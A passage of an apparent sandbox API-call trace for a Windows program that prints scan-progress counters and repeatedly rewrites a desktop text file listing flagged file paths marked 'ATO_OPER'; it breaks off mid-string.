[0112.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=267, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 267 [0112.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=267, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 267 [0112.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=267, lpMultiByteStr=0x1ef3218, cbMultiByte=267, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", lpUsedDefaultChar=0x0) returned 267 [0112.651] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ef3218*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1ef3218*, lpNumberOfBytesWritten=0x2a1fe34*=0x10b, lpOverlapped=0x0) returned 1 [0112.653] CloseHandle (hObject=0x1cc) returned 1 [0112.654] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1523 / B=4 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.654] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1523 / B=4 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1523 / B=4 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0112.654] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0112.671] Sleep (dwMilliseconds=0x5dc) [0115.465] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1618 / B=4 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0115.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1618 / B=4 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1618 / B=4 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0115.469] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0115.470] Sleep (dwMilliseconds=0x5dc) [0118.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0118.296] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\n", cchWideChar=325, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 325 [0118.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\n", cchWideChar=325, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 325 [0118.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\n", cchWideChar=325, lpMultiByteStr=0x268b7c8, cbMultiByte=325, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\n", lpUsedDefaultChar=0x0) returned 325 [0118.297] WriteFile (in: hFile=0x210, lpBuffer=0x268b7c8*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesWritten=0x2a1fe34*=0x145, lpOverlapped=0x0) returned 1 [0118.298] CloseHandle (hObject=0x210) returned 1 [0118.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1721 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0118.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1721 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1721 / B=5 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0118.298] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0118.299] Sleep (dwMilliseconds=0x5dc) [0124.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1808 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0124.156] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1808 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1808 / B=5 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0124.156] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0124.161] Sleep (dwMilliseconds=0x5dc) [0129.101] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1896 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0129.101] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=1896 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa53fc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=1896 / B=5 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0129.101] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0129.103] Sleep (dwMilliseconds=0x5dc) [0132.168] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2004 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.168] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2004 / B=5 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa53fc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2004 / B=5 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0132.168] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0132.170] Sleep (dwMilliseconds=0x5dc) [0136.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\n", cchWideChar=389, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 389 [0136.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\n", cchWideChar=389, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 389 [0136.480] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\n", cchWideChar=389, lpMultiByteStr=0x25be3f8, cbMultiByte=389, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\n!¶@R", lpUsedDefaultChar=0x0) returned 389 [0136.480] WriteFile (in: hFile=0x208, lpBuffer=0x25be3f8*, nNumberOfBytesToWrite=0x185, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesWritten=0x2a1fe34*=0x185, lpOverlapped=0x0) returned 1 [0136.481] CloseHandle (hObject=0x208) returned 1 [0136.481] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2143 / B=6 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0136.482] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2143 / B=6 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2143 / B=6 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0136.482] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0136.497] Sleep (dwMilliseconds=0x5dc) [0139.955] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2289 / B=6 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0139.955] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2289 / B=6 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2289 / B=6 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0139.955] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0139.956] Sleep (dwMilliseconds=0x5dc) [0144.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\n", cchWideChar=456, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 456 [0144.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\n", cchWideChar=456, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 456 [0144.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\n", cchWideChar=456, lpMultiByteStr=0x26dd2c8, cbMultiByte=456, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\n\x04\\SrW\x84d,$", lpUsedDefaultChar=0x0) returned 456 [0144.026] WriteFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesWritten=0x2a1fe34*=0x1c8, lpOverlapped=0x0) returned 1 [0144.027] CloseHandle (hObject=0x1f0) returned 1 [0144.028] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2395 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0144.028] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2395 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2395 / B=7 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0144.028] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0144.029] Sleep (dwMilliseconds=0x5dc) [0148.860] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2426 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0148.860] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2426 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2426 / B=7 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0148.860] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0148.861] Sleep (dwMilliseconds=0x5dc) [0152.944] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2479 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0152.944] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2479 / B=7 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa53fc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2479 / B=7 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0152.944] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0152.946] Sleep (dwMilliseconds=0x5dc) [0156.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0156.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\n", cchWideChar=552, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 552 [0156.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\n", cchWideChar=552, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 552 [0156.155] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: 